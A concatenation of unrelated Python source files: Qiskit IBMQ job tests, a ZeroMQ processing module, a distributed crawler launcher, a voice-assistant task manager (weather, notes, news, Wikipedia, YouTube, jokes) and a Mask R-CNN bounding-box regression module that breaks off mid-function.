raise SkipTest('Skipping test that requires multiple backends')
job_1 = backend_1.run(transpile(ReferenceCircuits.bell(), backend_1), validate_qobj=True)
job_2 = backend_2.run(transpile(ReferenceCircuits.bell(), backend_2), validate_qobj=True)
# test a retrieved job's backend is the same as the queried backend
self.assertEqual(backend_1.retrieve_job(job_1.job_id()).backend().name(),
backend_1.name())
self.assertEqual(backend_2.retrieve_job(job_2.job_id()).backend().name(),
backend_2.name())
# test retrieve requests for jobs that exist on other backends throw errors
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_1.retrieve_job, job_2.job_id())
self.assertIn('belongs to', str(context_manager.warning))
with self.assertWarns(Warning) as context_manager:
self.assertRaises(IBMQBackendError,
backend_2.retrieve_job, job_1.job_id())
self.assertIn('belongs to', str(context_manager.warning))
# Cleanup
for job in [job_1, job_2]:
cancel_job(job)
def test_retrieve_job_error(self):
"""Test retrieving an invalid job."""
self.assertRaises(IBMQBackendError,
self.provider.backend.retrieve_job, 'BAD_JOB_ID')
def test_retrieve_jobs_status(self):
"""Test retrieving jobs filtered by status."""
status_args = [JobStatus.DONE, 'DONE', [JobStatus.DONE], ['DONE']]
for arg in status_args:
with self.subTest(arg=arg):
backend_jobs = self.sim_backend.jobs(limit=5, skip=5, status=arg,
start_datetime=self.last_month)
self.assertTrue(backend_jobs)
for job in backend_jobs:
self.assertTrue(job.status() is JobStatus.DONE,
"Job {} has status {} when it should be DONE"
.format(job.job_id(), job.status()))
def test_retrieve_multiple_job_statuses(self):
"""Test retrieving jobs filtered by multiple job statuses."""
statuses_to_filter = [JobStatus.ERROR, JobStatus.CANCELLED]
status_filters = [
{'status': [JobStatus.ERROR, JobStatus.CANCELLED],
'db_filter': None},
{'status': [JobStatus.CANCELLED],
'db_filter': {'or': [{'status': {'regexp': '^ERROR'}}]}},
{'status': [JobStatus.ERROR],
'db_filter': {'or': [{'status': 'CANCELLED'}]}}
]
job_to_cancel = submit_and_cancel(backend=self.sim_backend)
job_to_fail = submit_job_bad_shots(backend=self.sim_backend)
job_to_fail.wait_for_final_state()
for status_filter in status_filters:
with self.subTest(status_filter=status_filter):
job_list = self.sim_backend.jobs(
status=status_filter['status'],
db_filter=status_filter['db_filter'],
start_datetime=self.last_month)
job_list_ids = [_job.job_id() for _job in job_list]
if job_to_cancel.status() is JobStatus.CANCELLED:
self.assertIn(job_to_cancel.job_id(), job_list_ids)
self.assertIn(job_to_fail.job_id(), job_list_ids)
for filtered_job in job_list:
self.assertIn(filtered_job._status, statuses_to_filter,
"job {} has status {} but should be one of {}"
.format(filtered_job.job_id(), filtered_job._status,
statuses_to_filter))
def test_retrieve_active_jobs(self):
"""Test retrieving jobs that are currently unfinished."""
backend = most_busy_backend(self.provider)
active_job_statuses = {api_status_to_job_status(status) for status in ApiJobStatus
if status not in API_JOB_FINAL_STATES}
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
active_jobs = backend.active_jobs()
if not job.in_final_state(): # Job is still active.
self.assertIn(job.job_id(), [active_job.job_id() for active_job in active_jobs])
for active_job in active_jobs:
self.assertTrue(active_job._status in active_job_statuses,
"status for job {} is '{}' but it should be '{}'."
.format(active_job.job_id(), active_job._status, active_job_statuses))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_queued(self):
"""Test retrieving jobs that are queued."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend))
# Wait for the job to queue, run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.QUEUED, JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_queued = backend.jobs(status=JobStatus.QUEUED, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.QUEUED and job.status() is JobStatus.QUEUED:
self.assertIn(job.job_id(), [queued_job.job_id() for queued_job in job_list_queued],
"job {} is queued but not retrieved when filtering for queued jobs."
.format(job.job_id()))
for queued_job in job_list_queued:
self.assertTrue(queued_job._status == JobStatus.QUEUED,
"status for job {} is '{}' but it should be {}"
.format(queued_job.job_id(), queued_job._status, JobStatus.QUEUED))
# Cancel job so it doesn't consume more resources.
cancel_job(job)
def test_retrieve_jobs_running(self):
"""Test retrieving jobs that are running."""
job = self.sim_backend.run(self.bell)
# Wait for the job to run, or reach a final state.
leave_states = list(JOB_FINAL_STATES) + [JobStatus.RUNNING]
while job.status() not in leave_states:
time.sleep(0.5)
before_status = job._status
job_list_running = self.sim_backend.jobs(status=JobStatus.RUNNING, limit=5,
start_datetime=self.last_month)
if before_status is JobStatus.RUNNING and job.status() is JobStatus.RUNNING:
self.assertIn(job.job_id(), [rjob.job_id() for rjob in job_list_running])
for rjob in job_list_running:
self.assertTrue(rjob._status == JobStatus.RUNNING,
"Status for job {} is '{}' but should be RUNNING"
.format(rjob.job_id(), rjob._status))
def test_retrieve_jobs_start_datetime(self):
"""Test retrieving jobs created after a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, start_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertGreaterEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_end_datetime(self):
"""Test retrieving jobs created before a specified datetime."""
past_month = datetime.now() - timedelta(days=30)
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, end_datetime=past_month)
self.assertTrue(job_list)
for job in job_list:
self.assertLessEqual(job.creation_date(), past_month_tz_aware,
'job {} creation date {} not within range'
.format(job.job_id(), job.creation_date()))
def test_retrieve_jobs_between_datetimes(self):
"""Test retrieving jobs created between two specified datetimes."""
date_today = datetime.now()
past_month = date_today - timedelta(30)
past_two_month = date_today - timedelta(60)
# Used for `db_filter`, should not override `start_datetime` and `end_datetime` arguments.
past_ten_days = date_today - timedelta(10)
db_filters = [None, {'creationDate': {'gt': past_ten_days}}]
# Add local tz in order to compare to `creation_date` which is tz aware.
past_month_tz_aware = past_month.replace(tzinfo=tz.tzlocal())
past_two_month_tz_aware = past_two_month.replace(tzinfo=tz.tzlocal())
for db_filter in db_filters:
with self.subTest(db_filter=db_filter):
job_list = self.provider.backend.jobs(
backend_name=self.sim_backend.name(), limit=2,
start_datetime=past_two_month, end_datetime=past_month, db_filter=db_filter)
self.assertTrue(job_list)
for job in job_list:
self.assertTrue(
(past_two_month_tz_aware <= job.creation_date() <= past_month_tz_aware),
'job {} creation date {} not within range'.format(
job.job_id(), job.creation_date()))
def test_retrieve_jobs_db_filter(self):
"""Test retrieving jobs using db_filter."""
# Submit jobs with desired attributes.
qc = QuantumCircuit(3, 3)
qc.h(0)
qc.measure([0, 1, 2], [0, 1, 2])
job = self.sim_backend.run(transpile(qc, backend=self.sim_backend))
job.wait_for_final_state()
my_filter = {'backend.name': self.sim_backend.name(),
'summaryData.summary.qobj_config.n_qubits': 3,
'status': 'COMPLETED'}
job_list = self.provider.backend.jobs(backend_name=self.sim_backend.name(),
limit=2, skip=5, db_filter=my_filter,
start_datetime=self.last_month)
self.assertTrue(job_list)
for job in job_list:
job.refresh()
self.assertEqual(
job.summary_data_['summary']['qobj_config']['n_qubits'], 3,
"Job {} does not have correct data.".format(job.job_id())
)
def test_pagination_filter(self):
"""Test db_filter that could conflict with pagination."""
jobs = self.sim_backend.jobs(limit=25, start_datetime=self.last_month)
job = jobs[3]
job_utc = local_to_utc(job.creation_date()).isoformat()
db_filters = [
{'id': {'neq': job.job_id()}},
{'and': [{'id': {'neq': job.job_id()}}]},
{'creationDate': {'neq': job_utc}},
{'and': [{'creationDate': {'gt': job_utc}}]}
]
for db_filter in db_filters:
with self.subTest(filter=db_filter):
job_list = self.sim_backend.jobs(limit=25, db_filter=db_filter)
self.assertTrue(job_list)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in job_list],
"Job {} with creation date {} should not be returned".format(
job.job_id(), job_utc))
def test_retrieve_jobs_order(self):
"""Test retrieving jobs with different orders."""
job = self.sim_backend.run(self.bell)
job.wait_for_final_state()
newest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=True, start_datetime=self.last_month)
self.assertIn(job.job_id(), [rjob.job_id() for rjob in newest_jobs])
oldest_jobs = self.sim_backend.jobs(
limit=10, status=JobStatus.DONE, descending=False, start_datetime=self.last_month)
self.assertNotIn(job.job_id(), [rjob.job_id() for rjob in oldest_jobs])
def test_retrieve_failed_job_simulator_partial(self):
"""Test retrieving partial results from a simulator backend."""
job = submit_job_one_bad_instr(self.sim_backend)
result = job.result(partial=True)
self.assertIsInstance(result, Result)
self.assertTrue(result.results[0].success)
self.assertFalse(result.results[1].success)
@slow_test
def test_pulse_job(self):
"""Test running a pulse job."""
backends = self.provider.backends(open_pulse=True, operational=True)
if not backends:
raise SkipTest('Skipping pulse test since no pulse backend found.')
backend = least_busy(backends)
config = backend.configuration()
defaults = backend.defaults()
inst_map = defaults.instruction_schedule_map
# Run 2 experiments - 1 with x pulse and 1 without
x = inst_map.get('x', 0)
measure = inst_map.get('measure', range(config.n_qubits)) << x.duration
ground_sched = measure
excited_sched = x | measure
schedules = [ground_sched, excited_sched]
job = backend.run(schedules, meas_level=1, shots=256)
job.wait_for_final_state(wait=300, callback=self.simple_job_callback)
self.assertTrue(job.done(), "Job {} didn't complete successfully.".format(job.job_id()))
self.assertIsNotNone(job.result(), "Job {} has no result.".format(job.job_id()))
def test_retrieve_from_retired_backend(self):
"""Test retrieving a job from a retired backend."""
saved_backends = copy.copy(self.provider._backends)
try:
del self.provider._backends[self.sim_backend.name()]
new_job = self.provider.backend.retrieve_job(self.sim_job.job_id())
self.assertTrue(isinstance(new_job.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job.backend().name(), 'unknown')
new_job2 = self.provider.backend.jobs(
db_filter={'id': self.sim_job.job_id()}, start_datetime=self.last_month)[0]
self.assertTrue(isinstance(new_job2.backend(), IBMQRetiredBackend))
self.assertNotEqual(new_job2.backend().name(), 'unknown')
finally:
self.provider._backends = saved_backends
def test_refresh_job_result(self):
"""Test re-retrieving job result via refresh."""
result = self.sim_job.result()
# Save original cached results.
cached_result = copy.deepcopy(result.to_dict())
self.assertTrue(cached_result)
# Modify cached results.
result.results[0].header.name = 'modified_result'
self.assertNotEqual(cached_result, result.to_dict())
self.assertEqual(result.results[0].header.name, 'modified_result')
# Re-retrieve result via refresh.
result = self.sim_job.result(refresh=True)
self.assertDictEqual(cached_result, result.to_dict())
self.assertNotEqual(result.results[0].header.name, 'modified_result')
@requires_device
def test_wait_for_final_state(self, backend):
"""Test waiting for job to reach final state."""
def final_state_callback(c_job_id, c_status, c_job, **kwargs):
"""Job status query callback function."""
self.assertEqual(c_job_id, job.job_id())
self.assertNotIn(c_status, JOB_FINAL_STATES)
self.assertEqual(c_job.job_id(), job.job_id())
self.assertIn('queue_info', kwargs)
queue_info = kwargs.pop('queue_info', None)
callback_info['called'] = True
if wait_time is None:
# Look for status change.
data = {'status': c_status, 'queue_info': queue_info}
self.assertNotEqual(data, callback_info['last data'])
callback_info['last data'] = data
else:
# Check called within wait time.
if callback_info['last call time'] and job._status not in JOB_FINAL_STATES:
self.assertAlmostEqual(
time.time() - callback_info['last call time'], wait_time, delta=0.2)
callback_info['last call time'] = time.time()
def job_canceller(job_, exit_event, wait):
exit_event.wait(wait)
cancel_job(job_)
qc = get_large_circuit(backend)
wait_args = [5, None]
for wait_time in wait_args:
with self.subTest(wait_time=wait_time):
# Put callback data in a dictionary to make it mutable.
callback_info = {'called': False, 'last call time': 0.0, 'last data': {}}
cancel_event = Event()
job = backend.run(transpile(qc, backend=backend))
# Cancel the job after a while.
Thread(target=job_canceller, args=(job, cancel_event, 60), daemon=True).start()
try:
job.wait_for_final_state(timeout=90, wait=wait_time,
callback=final_state_callback)
self.assertTrue(job.in_final_state())
self.assertTrue(callback_info['called'])
cancel_event.set()
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
def test_wait_for_final_state_timeout(self):
"""Test waiting for job to reach final state times out."""
backend = most_busy_backend(self.provider)
job = backend.run(transpile(ReferenceCircuits.bell(), backend=backend),
validate_qobj=True)
try:
self.assertRaises(IBMQJobTimeoutError, job.wait_for_final_state, timeout=0.1)
finally:
# Ensure all threads ended.
for thread in job._executor._threads:
thread.join(0.1)
cancel_job(job)
def test_job_submit_partial_fail(self):
"""Test job submit partial fail."""
job_id = []
def _side_effect(self, *args, **kwargs):
# pylint: disable=unused-argument
job_id.append(self.job_id)
raise RequestsApiError('Kaboom')
fail_points = ['put_object_storage', 'callback_upload']
for fail_method in fail_points:
with self.subTest(fail_method=fail_method):
with mock.patch.object(RestJob, fail_method,
side_effect=_side_effect, autospec=True):
with self.assertRaises(IBMQBackendApiError):
self.sim_backend.run(self.bell)
self.assertTrue(job_id, "Job ID not saved.")
job = self.sim_backend.retrieve_job(job_id[0])
self.assertEqual(job.status(), JobStatus.CANCELLED,
f"Job {job.job_id()} status is {job.status()} and not cancelled!")
def test_job_circuits(self):
"""Test job circuits."""
self.assertEqual(str(self.bell), str(self.sim_job.circuits()[0]))
def test_job_backend_options(self):
"""Test job backend options."""
run_config = {'shots': 2048, 'memory': True}
job = self.sim_backend.run(self.bell, **run_config)
self.assertLessEqual(run_config.items(), job.backend_options().items())
def test_job_header(self):
"""Test job header."""
|
BaseModule.py
|
"""
Created by Danil Lykov @danlkv on 14/02/19
"""
import zmq, os, time
import json
from pprint import pprint
import multiprocessing as prc
from goalnet.helpers.log_init import log
from goalnet.core.utils import themify, dethemify, get_network_config
import trio
class BaseModule:
"""
A base class for Goal Net data processing modules
"""
def __init__(self, netconf,name='baseModule'):
self.netconf = netconf
self.source = self._get_mux_socket()
self.drain = self._get_dmx_socket()
self.name = name
def _print(self,msg):
"""
A simple wrapper of loggin to maybe pass some
internal params to log
"""
log.info(msg)
"""
Some methods to get sockets of MUX and DMX
"""
def _get_dmx_socket(self):
ctx = zmq.Context()
s = ctx.socket(zmq.PUSH)
s.connect(self.netconf.get_address("DMX"))
return s
def _get_mux_socket(self,topics=[b'']):
ctx = zmq.Context()
s = ctx.socket(zmq.SUB)
for topic in topics:
s.setsockopt(zmq.SUBSCRIBE, topic)
s.connect(self.netconf.get_address("MUX_out"))
return s
def _recv(self):
"""
wrapper for receiving a data from sub socket
need to get topic first, then parse json from
remaining data
"""
raw = self.source.recv_string()
topic, msg = dethemify(raw)
return msg
def handle_action(self,msg):
raise NotImplementedError
def server_listen_loop(self):
"""
Loop forever and apply handle_action to
every message, then send result to dmx if any
"""
self._print("running...")
while True:
msg = self._recv()
notif = self.handle_action(msg)
if notif:
self._print('sending',notif)
self.drain.send_json(notif)
def start(self):
self.server_listen_loop()
def start_process(self):
process = prc.Process(target=self.start, name=self.name)
process.start()
self.process = process
|
SpiderMan.py
|
from multiprocessing import Queue, Process
from distributedSpider.NodeManager import NodeManager
if __name__=='__main__':
#初始化4个队列
url_q = Queue()
result_q = Queue()
store_q = Queue()
conn_q = Queue()
#创建分布式管理器
node = NodeManager()
manager = node.start_Manager(url_q,result_q)
#创建URL管理进程、 数据提取进程和数据存储进程
url_manager_proc = Process(target=node.url_manager_proc, args=(url_q, conn_q, 'http://baike.baidu.com/view/284853.htm'))
result_solve_proc = Process(target=node.result_solve_proc, args=(result_q, conn_q, store_q,))
store_proc = Process(target=node.store_proc, args=(store_q,))
#启动3个进程和分布式管理器
url_manager_proc.start()
result_solve_proc.start()
store_proc.start()
manager.get_server().serve_forever()
|
taskmanager.py
|
import datetime
import glob
import json
import multiprocessing
import os
import math
import random
import lxml
import requests
import subprocess
from time import sleep
from urllib.request import urlopen
import wikipedia
from bs4 import BeautifulSoup as soup
from pytube import YouTube
from youtubesearchpython import VideosSearch
from etc.memory import MemoryUnit
from etc.qna_parser import Parser
p = Parser()
jokelist = []
class TaskManager(MemoryUnit):
def __init__(self):
super().__init__()
pass
def ocr_read(self):
# observe_direction()
# text = read_text()
# return text
pass
def weather(self, api_key, city):
# base_url variable to store url
base_url = "http://api.openweathermap.org/data/2.5/weather?"
# Give city name
city_name = city
# complete_url variable to store
# complete url address
complete_url = base_url + "appid=" + api_key + "&q=" + city_name
# get method of requests module
# return response object
response = requests.get(complete_url)
# json method of response object
# convert json format data into
# python format data
x = response.json()
# Now x contains list of nested dictionaries
# Check the value of "cod" key is equal to
# "404", means city is found otherwise,
# city is not found
if x["cod"] != "404":
# store the value of "main"
# key in variable y
y = x["main"]
# store the value corresponding
# to the "temp" key of y
current_temperature = math.ceil((int(y["temp"]) - 273))
# store the value corresponding
# to the "pressure" key of y
# store the value corresponding
# to the "humidity" key of y
current_humidity = y["humidity"]
# store the value of "weather"
# key in variable z
z = x["weather"]
# store the value corresponding
# to the "description" key at
# the 0th index of z
weather_description = z[0]["description"]
return weather_description, current_temperature, current_humidity
else:
return "City Not Found", "City Not Found", "City Not Found"
def take_note(self, text):
"""just pass the text to be saved or notted down"""
self.date = str(datetime.datetime.now().date()) + "%" + str(datetime.datetime.now().hour) + "+" + str(
datetime.datetime.now().minute) + "}"
self.file_name = "notes/" + str(self.date).replace(":", "-") + "-note.txt"
with open(self.file_name, "w") as f:
f.write(text)
# subprocess.Popen(["notepad.exe", self.file_name])
def get_note(self, args):
"""
available args:
latest : reads latest note
total : returns num of notes
yesterday : returns yesterday's note
"""
self.list_of_files = glob.glob('notes/*') # * means all if need specific format then *.csv
if "latest" in args.lower() or "last note" in args.lower():
self.latest_file = max(self.list_of_files, key=os.path.getctime)
self.latest_file = str(self.latest_file.replace("notes", ""))
with open(f"notes{self.latest_file}", "r") as g:
return g.read()
elif "total" in args.lower() or "how many" in args.lower():
return len(self.list_of_files)
elif "yesterday" in args.lower():
self.ys = str(datetime.datetime.now().day)
self.ys = int(self.ys) - 1
print(self.ys)
self.mn = datetime.datetime.now().month
self.yr = datetime.datetime.now().year
print(f"{self.yr}-{self.mn}-{self.ys}")
for i in self.list_of_files:
if f"{self.yr}-{self.mn}-{self.ys}" in i:
with open(f"{i}", "r") as re:
return re
else:
return "you haven't made any entries yesterday"
# def get_note_time
def get_note_time(self, filename, arg="ymd"):
self.ymd = filename[:"%"]
self.hour = filename["%":"+"]
self.minute = filename["+":]
if arg == "ymd":
return self.ymd
elif arg == "hr":
return self.hour
elif arg == "min":
return self.hour
def news(self, headlines):
"""
--------------------------------------------------------------------------------------------
:ARGS: Headlines(int) [number of headlines you want]
:PARSING: https://news.google.com/rss?hl=en-US&gl=US&ceid=US:en
change US in the above link to IN for Indian news, CA for Canada, and so on.
Keep it just https://news.google.com/rss for dynanimic location selection based on your IP
address
:OUTPUT: returns a list of headlines
--------------------------------------------------------------------------------------------
"""
self.nl = []
try:
self.int_num = int(headlines)
print(self.int_num)
self.newsurl = "https://news.google.com/rss?hl=en-US&gl=US&ceid=US:en"
self.root = urlopen(self.newsurl)
self.xmlpage = self.root.read()
self.root.close()
self.souppage = soup(self.xmlpage, "xml")
self.newslist = self.souppage.findAll("item")
for news in self.newslist[:self.int_num]:
# speak(news.pubDate.text)
sleep(1)
self.nl.append(news.title.text)
return self.nl
except Exception as e:
return f"Looks like something went wrong. Try connecting to internet. {e}"
def wiki(self, query):
"""
Get summary of topics from wikipedia.
Requested args: query(the topic you want to search)
NOTE: INCREASE sentences=3 TO ANY NUMBER IF REQUIRED,
HIGHER THE VALUE = LONGER INFO
SMALLER THE VALUE = LESS INFO AND NOT MUCH USEFULL INFO
IS RETRIEVED
"""
try:
return wikipedia.summary(query, sentences=3)
except Exception as e:
return e
def parse_youtube_query(self, query):
videosSearch = VideosSearch(query, limit = 1)
self.get_youtube_audio(videosSearch.result()['result'][0]['link'])
def get_youtube_audio(self, link):
"""
:INPUT: Youtube video link
:PROCESS: Downloads the audio of the video only,
and saves it to music directory.
:OUTPUT: Returns nothing, just saves the music at /music dir
"""
self.yt = YouTube(link)
self.t = self.yt.streams.filter(only_audio=True)
self.t[0].download("music/")
print(f"downloaded {link}")
"""
def player(self):
global stop_thread
url = "https://www.youtube.com/watch?v=svT7uKdNphU"
video = pafy.new(url)
best = video.getbest()
playurl = best.url
Instance = vlc.Instance()
player = Instance.media_player_new()
Media = Instance.media_new(playurl)
Media.get_mrl()
player.set_media(Media)
player.play()
"""
def play(self, query):
"""
os.startfile("music/coldbrew - Simple.mp4")
sleep(2)
# self.player =
print("Threading succeded")
x = input(": ")
if x == "quit":
subprocess.call(["taskkill", "/F", "/IM", "Wmplayer.exe"])
# in linux: killall -9 totem
"""
"""
players = multiprocessing.Process(target=self.player(), daemon=True)
players.start()
x = input(":")
if x == "quit":
players.terminate()"""
def memorise(self, question, answer):
"""
:param question:
:param answer:
:return:
"""
print(p.parse_question(question))
print(p.parse_answer(answer))
# self.data_entry(question, answer)
def google(self, query):
"""
:param query:
:return: google snippet text
"""
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582"
}
html = requests.get(f'https://www.google.com/search?q={query}', headers=headers).text
self.sp = soup(html, 'lxml')
try:
summary = self.sp.select_one('.Uo8X3b+ span').text
if len(summary) == 0:
return None
else:
return summary
except:
try:
l = self.sp.select(".TrT0Xe")
self.google_list = []
for i in l:
self.google_list.append(i.text)
if len(self.google_list) == 0:
return None
else:
return ", ".join(self.google_list)
except:
return None
def joke(self):
"""
return jokes
"""
f = r"https://official-joke-api.appspot.com/random_ten"
try:
data = requests.get(f)
data = json.loads(data.text)
if len(jokelist) == 0:
print("form web")
for jokes in data:
jokelist.append(jokes["setup"]+" "+jokes["punchline"])
return random.choice(jokelist)
else:
print("from storage")
return random.choice(jokelist)
except Exception as e:
return "unable to get jokes right now"
|
bbox_regression.py
|
"""
This file has functions about generating bounding box regression targets
"""
from ..pycocotools.mask import encode
import numpy as np
from ..logger import logger
from .bbox_transform import bbox_overlaps, bbox_transform
from rcnn.config import config
import math
import cv2
import PIL.Image as Image
import threading
import Queue
def compute_bbox_regression_targets(rois, overlaps, labels):
"""
given rois, overlaps, gt labels, compute bounding box regression targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
:return: targets[i][class, dx, dy, dw, dh] k * 5
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
logger.warning('bbox regression: len(rois) != len(overlaps)')
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
logger.warning('bbox regression: len(gt_inds) == 0')
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
targets = np.zeros((rois.shape[0], 5), dtype=np.float32)
targets[ex_inds, 0] = labels[ex_inds]
targets[ex_inds, 1:] = bbox_transform(ex_rois, gt_rois)
return targets
def add_bbox_regression_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
logger.info('bbox regression: add bounding box regression targets')
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
num_classes = roidb[0]['gt_overlaps'].shape[1]
for im_i in range(num_images):
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
roidb[im_i]['bbox_targets'] = compute_bbox_regression_targets(
rois, max_overlaps, max_classes)
if config.TRAIN.BBOX_NORMALIZATION_PRECOMPUTED:
# use fixed / precomputed means and stds instead of empirical values
means = np.tile(np.array(config.TRAIN.BBOX_MEANS), (num_classes, 1))
stds = np.tile(np.array(config.TRAIN.BBOX_STDS), (num_classes, 1))
else:
# compute mean, std values
class_counts = np.zeros((num_classes, 1)) + 1e-14
sums = np.zeros((num_classes, 4))
squared_sums = np.zeros((num_classes, 4))
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
if cls_indexes.size > 0:
class_counts[cls] += cls_indexes.size
sums[cls, :] += targets[cls_indexes, 1:].sum(axis=0)
squared_sums[cls, :] += (targets[cls_indexes,
1:]**2).sum(axis=0)
means = sums / class_counts
# var(x) = E(x^2) - E(x)^2
stds = np.sqrt(squared_sums / class_counts - means**2)
# normalized targets
for im_i in range(num_images):
targets = roidb[im_i]['bbox_targets']
for cls in range(1, num_classes):
cls_indexes = np.where(targets[:, 0] == cls)[0]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] -= means[cls, :]
roidb[im_i]['bbox_targets'][cls_indexes, 1:] /= stds[cls, :]
return means.ravel(), stds.ravel()
def expand_bbox_regression_targets(bbox_targets_data, num_classes):
"""
expand from 5 to 4 * num_classes; only the right class has non-zero bbox regression targets
:param bbox_targets_data: [k * 5]
:param num_classes: number of classes
:return: bbox target processed [k * 4 num_classes]
bbox_weights ! only foreground boxes have bbox regression computation!
"""
classes = bbox_targets_data[:, 0]
bbox_targets = np.zeros((classes.size, 4 * num_classes), dtype=np.float32)
bbox_weights = np.zeros(bbox_targets.shape, dtype=np.float32)
indexes = np.where(classes > 0)[0]
for index in indexes:
cls = classes[index]
start = int(4 * cls)
end = start + 4
bbox_targets[index, start:end] = bbox_targets_data[index, 1:]
bbox_weights[index, start:end] = config.TRAIN.BBOX_WEIGHTS
return bbox_targets, bbox_weights
def compute_mask_and_label(ex_rois, ex_labels, seg, flipped):
# assert os.path.exists(seg_gt), 'Path does not exist: {}'.format(seg_gt)
# im = Image.open(seg_gt)
# pixel = list(im.getdata())
# pixel = np.array(pixel).reshape([im.size[1], im.size[0]])
im = Image.open(seg)
pixel = list(im.getdata())
ins_seg = np.array(pixel).reshape([im.size[1], im.size[0]])
if flipped:
ins_seg = ins_seg[:, ::-1]
rois = ex_rois
n_rois = ex_rois.shape[0]
label = ex_labels
class_id = config.CLASS_ID
mask_target = np.zeros((n_rois, 28, 28), dtype=np.int8)
mask_label = np.zeros((n_rois), dtype=np.int8)
for n in range(n_rois):
target = ins_seg[int(rois[n, 1]):int(rois[n, 3]),
int(rois[n, 0]):int(rois[n, 2])]
ids = np.unique(target)
ins_id = 0
max_count = 0
for id in ids:
if math.floor(id / 1000) == class_id[int(label[int(n)])]:
px = np.where(ins_seg == int(id))
x_min = np.min(px[1])
y_min = np.min(px[0])
x_max = np.max(px[1])
y_max = np.max(px[0])
x1 = max(rois[n, 0], x_min)
y1 = max(rois[n, 1], y_min)
x2 = min(rois[n, 2], x_max)
y2 = min(rois[n, 3], y_max)
iou = (x2 - x1) * (y2 - y1)
iou = iou / ((rois[n, 2] - rois[n, 0]) *
(rois[n, 3] - rois[n, 1]) + (x_max - x_min) *
(y_max - y_min) - iou)
if iou > max_count:
ins_id = id
max_count = iou
if max_count == 0:
continue
# print max_count
mask = np.zeros(target.shape)
idx = np.where(target == ins_id)
mask[idx] = 1
mask = cv2.resize(mask, (28, 28), interpolation=cv2.INTER_NEAREST)
mask_target[n] = mask
mask_label[n] = label[int(n)]
return mask_target, mask_label
def compute_bbox_mask_targets_and_label(rois, overlaps, labels, seg, flipped):
"""
given rois, overlaps, gt labels, seg, compute bounding box mask targets
:param rois: roidb[i]['boxes'] k * 4
:param overlaps: roidb[i]['max_overlaps'] k * 1
:param labels: roidb[i]['max_classes'] k * 1
:return: targets[i][class, dx, dy, dw, dh] k * 5
"""
# Ensure ROIs are floats
rois = rois.astype(np.float, copy=False)
# Sanity check
if len(rois) != len(overlaps):
print 'bbox regression: this should not happen'
# Indices of ground-truth ROIs
gt_inds = np.where(overlaps == 1)[0]
if len(gt_inds) == 0:
print 'something wrong : zero ground truth rois'
# Indices of examples for which we try to make predictions
ex_inds = np.where(overlaps >= config.TRAIN.BBOX_REGRESSION_THRESH)[0]
# Get IoU overlap between each ex ROI and gt ROI
ex_gt_overlaps = bbox_overlaps(rois[ex_inds, :], rois[gt_inds, :])
# Find which gt ROI each ex ROI has max overlap with:
# this will be the ex ROI's gt target
gt_assignment = ex_gt_overlaps.argmax(axis=1)
gt_rois = rois[gt_inds[gt_assignment], :]
ex_rois = rois[ex_inds, :]
mask_targets, mask_label = compute_mask_and_label(ex_rois, labels[ex_inds],
seg, flipped)
return mask_targets, mask_label, ex_inds
def add_mask_targets(roidb):
"""
given roidb, add ['bbox_targets'] and normalize bounding box regression targets
:param roidb: roidb to be processed. must have gone through imdb.prepare_roidb
:return: means, std variances of targets
"""
print 'add bounding box mask targets'
assert len(roidb) > 0
assert 'max_classes' in roidb[0]
num_images = len(roidb)
# Multi threads processing
im_quene = Queue.Queue(maxsize=0)
for im_i in range(num_images):
im_quene.put(im_i)
def process():
while not im_quene.empty():
im_i = im_quene.get()
print "-----process img {}".format(im_i)
rois = roidb[im_i]['boxes']
max_overlaps = roidb[im_i]['max_overlaps']
max_classes = roidb[im_i]['max_classes']
ins_seg = roidb[im_i]['ins_seg']
flipped = roidb[im_i]['flipped']
